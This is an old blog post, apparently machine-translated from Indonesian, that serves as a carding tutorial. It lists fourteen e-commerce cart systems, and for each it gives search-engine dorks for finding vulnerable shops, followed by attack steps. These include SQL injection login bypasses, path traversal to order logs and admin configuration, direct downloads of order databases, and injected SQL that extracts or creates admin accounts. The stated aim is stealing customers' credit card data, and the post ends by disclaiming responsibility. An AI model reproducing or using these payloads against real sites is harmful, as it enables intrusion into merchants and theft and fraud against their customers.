Home >Unlabelled > Engineering carding
Engineering carding
Posted on 7/22/2009
1. example in the form of bugs shopadmin shop system:
example shop will appear on search engines when some mengetikan
keyword, such as:
Google.com Type: -> allinurl: / shopadmin.asp
Sample target: www.xxxxxx.com / shopadmin.asp
The weakness of this system if criminals enter the
code injection, such as:
user: 'or'1
pass: 'or'1
2. example in the form of bugs shop system: Index CGI
example shop will appear on search engines when some mengetikan
keyword, such as:
google.com: Type -> allinurl: / store / index.cgi / page =
Sample target: www.xxxxxx.com/cgi-bin/store/index.cgi?page=short_blue.htm
Delete and replace with short_blue.htm -> .. / admin / files / order.log
The result: www.xxxxxxx.com/cgi-bin/store/index.cgi?page=../admin/files/
order.log
3. example in the form of bugs shop system: metacart
example shop will appear on search engines when some mengetikan
keyword, such as:
google.com allinurl: / metacart /
Sample target: www.xxxxxx.com / metacart / about.asp
Moreinfo.asp Remove and replace with -> / database / metacart.mdb
The result: / www.xxxxxx.com / metacart / database / metacart.mdb
4. example in the form of bugs shop system: DCShop
example shop will appear on search engines when some mengetikan
keyword, such as:
google.com: Type -> allinurl: / DCShop /
Example: www.xxxxxx.com / xxxx / DCShop / xxxx
Remove / DCShop / xxxx and replace with -> / DCShop / orders / orders.txt
or / DCShop / Orders / orders.txt
The result: www.xxxx.com / xxxx / DCShop / orders / orders.txt
5. example in the form of bugs shop system: PDshopro
example shop will appear on search engines when some mengetikan
keyword, such as:
google.com: Type -> allinurl: / shop / category.asp / catid =
Example: www.xxxxx.com/shop/category.asp/catid=xxxxxx
Remove / shop / category.asp / catid = xxxxx dang replace with -> / admin /
dbsetup.asp
The result: www.xxxxxx.com / admin / dbsetup.asp
From above description, we will see a file with a database name
sdatapdshoppro.mdb
Download file sdatapdshoppro.mdb with the url into its
www.xxxxxx.com / data / pdshoppro.mdb
Open the page file use Microsoft Access (the database to read
access.mdb should aja pake ms access)
6. example in the form of bugs shop system: commerceSQL
example shop will appear on search engines when some mengetikan
keyword, such as:
google: Type -> allinurl: / commercesql /
Example: www.xxxxx.com / commercesql / xxxxx
Remove commercesql / xxxxx and replace with ->
cgi-bin/commercesql/index.cgi? page =
The result: www.xxxxxx.com/cgi-bin/commercesql/index.cgi?page =
To view the admin config ->
www.xxxxxx.com/cgi-bin/commercesql/index.cgi?page=../admin/admin_conf.pl
To view the admin manager ->
www.xxxxxx.com/cgi-bin/commercesql/index.cgi?page=../admin/manager.cgi
To view the log file / CCnya ->
www.xxxxx.com/cgi-bin/commercesql/index.cgi?page=../admin/files/order ...
7. example in the form of bugs shop system: eShop
example shop will appear on search engines when some mengetikan
keyword, such as:
google: Type -> allinurl: / eShop /
Example: www.xxxxx.com / xxxxx / eShop
Remove / eShop and replace with -> / cg-bin/eshop/database/order.mdb
The result: www.xxxxxx.com / ... / cg-bin / eShop / database / order.mdb
Download the file and its *. mdb Open the page file use Microsoft Acces
(to read the database because it is a access.mdb ms access
aja)
8. example in the form of bugs shop system: Cart32 v3.5a
example shop will appear on search engines when some mengetikan
keyword, such as:
google.com: Type -> allinurl: / cart32.exe /
Example: www.xxxxxx.net/wrburns_s/cgi-bin/cart32.exe/NoItemFound
Replace with NoItemFound -> error
If we find some error information page under installation,
means that we will succeed!
Now, we go on the information below, slide the page
down, and search the Page Setup and Directory
If the file is there with a list format / suffixes. C32
means that the page in the site. there is a file containing data cc
Copy a file. C32 or everything you have to program or notepad
other text editor.
Change page url string. be like this: http://www.xxxxxx.net/wrburns_s/cgi-bin/cart32/
Nah .., paste one by one, the file. C32 to the end of the url you have
modified before, with the format
http://www.xxxxx.com/cart32/
Example http://www.xxxxxxx.net/wrburns_s/cgi-bin/cart32/WRBURNS-001065.c32
9. bugs in the form of an example system stores: VP-ASP Shopping Cart 5.0
engineering / road to the two
google.com Type -> allinurl: / vpasp / shopdisplayproducts.asp
Open the target url and add the following string at the end of the
shopdisplayproducts.asp
Example:
http://xxxxxxx.com/vpasp/shopdisplayproducts.asp?cat=qwerty '% 20union %...,
fldpassword% 20from% 20tbluser% 20where% 20fldusername =
'admin'% 20and% 20fldpassword% 20like% 20'a% 25' --
Change the value of the last string url dg:
% 20'a% 25' --
20'b%% 25' --
% 20'c% 25' --
If successful, we will get a username and password information
admin
To login to the admin http://xxxx.com/vpasp/shopadmin.asp
Find your own data, please CCnya
10. bugs in the form of an example system stores: VP-ASP Shopping Cart 5.0
example shop will appear on search engines when some mengetikan
keyword, such as:
google.com: Type -> allinurl: / vpasp / shopsearch.asp
Open the url for the target and create a new admin, postingkan following data
one by one in the search engines:
Keyword = & category = 5); insert into tbluser (fldusername) values
('')--& = & SubCategory = hide & action.x = 46 & action.y = 6
Keyword = & category = 5); update tbluser set fldpassword =''where
fldusername =''--& SubCategory = All & action.x = 33 & action.y = 6
Keyword = & category = 3); update tbluser set fldaccess ='1 'where
fldusername =''--& SubCategory = All & action.x = 33 & action.y = 6
Do not forget to change and it's up to you.
To change the admin password, enter the keyword below:
Keyword = & category = 5); update tbluser set fldpassword =''where
fldusername = 'admin' - & SubCategory = All & action.x = 33 & action.y = 6
Login to admin, in http://xxxxxxx/vpasp/shopadmin.asp
11. example in the form of bugs shop system: Lobby.asp
example shop will appear on search engines when some mengetikan
keyword, such as:
google.com Type -> allinurl: Lobby.asp
Example: www.xxxxx.com / mall / lobby.asp
Remove any posts mall / lobby.asp and replace with -> fpdb / shop.mdb
The result: www.xxxxx.com / fpdb / shop.mdb
12. example in the form of bugs shop system: Shopper.cgi
example shop will appear on search engines when some mengetikan
keyword, such as:
google: Type -> allinurl: / cgi-local/shopper.cgi
Example: www.xxxxxx.com/cgi-local/shopper.cgi/?preadd=action&key =
Add the -> & template = ... order.log
The result: www.xxxxxxxx.com/cgi-local/shopper.cgi?preadd=action&key=...&template ...
13. example in the form of bugs shop system: Proddetail.asp
example shop will appear on search engines when some mengetikan
keyword, such as:
Type -> allinurl: proddetail.asp? Prod =
Example: www.xxxxx.org/proddetail.asp?prod=ACSASledRaffle
Remove any posts proddtail.asp? Prod = SG369 and replace with -> fpdb /
vsproducts.mdb
The result: www.xxxxxx.org / fpdb / vsproducts.mdb
14. example in the form of bugs shop system: Digishop
example shop will appear on search engines when some mengetikan
keyword, such as:
Type in google -> inurl: "/ cart.php? m ="
Example: http://xxxxxxx.com/store/cart.php?m=view.
Remove any posts cart.php? M = view and replace with -> admin
The result http://xxxxxx.com/store/admin
You go the same username pass it on statment SQL injection
Usename: 'or "="
Password: 'or "="
.:: Note !::..
I DONT TAKE ANY responsible for ANYTING ... U TAKE UR OWN RISK ..!!!